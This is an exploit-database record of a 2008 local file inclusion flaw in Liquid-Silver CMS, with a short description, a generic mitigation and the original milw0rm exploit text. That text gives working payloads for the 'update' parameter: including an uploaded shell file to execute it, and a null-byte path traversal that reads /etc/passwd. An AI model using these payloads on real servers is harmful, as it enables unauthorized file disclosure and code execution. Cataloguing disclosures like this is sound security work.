Liquid-Silver CMS Local File Inclusion Vulnerabilities

vendor:

Liquid-Silver CMS

by:

Stack-Terrorist

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Liquid-Silver CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Liquid-Silver CMS Local File Inclusion Vulnerabilities

Liquid-Silver CMS is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability to read and execute arbitrary files on the server. The attacker can exploit this vulnerability by sending a crafted HTTP request containing malicious input to the vulnerable application. The attacker can use the 'update' parameter to read and execute arbitrary files on the server. The attacker does not need to specify the file extension in the request.

Mitigation:

The application should validate user input and filter out malicious input. The application should also restrict access to sensitive files and directories.

Source

Exploit-DB raw data:

####################################################################################
###### Liquid-Silver CMS   Local File Inclusion Vulnerabilities                #####
###### http://sourceforge.net/project/showfiles.php?group_id=171166            #####
###### author : Stack-Terrorist [v40]                                          #####
###### foor read a php file > ?update=[name of file iwthout php]               #####
###### for execute exploit does not write extention of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/update/index.php?update=/[name of file wthout php]    #####
######                                                                         #####
###### example : /Script/update/index.php?update=/home/user/shell              #####
######                                                                         #####
###### other files:    update=../../../../etc/passwd%00                        #####
######                                                                         #####
######  H-T Team , v4 Team  , Tryag , no-hack all my friend                    #####
####################################################################################

# milw0rm.com [2008-01-23]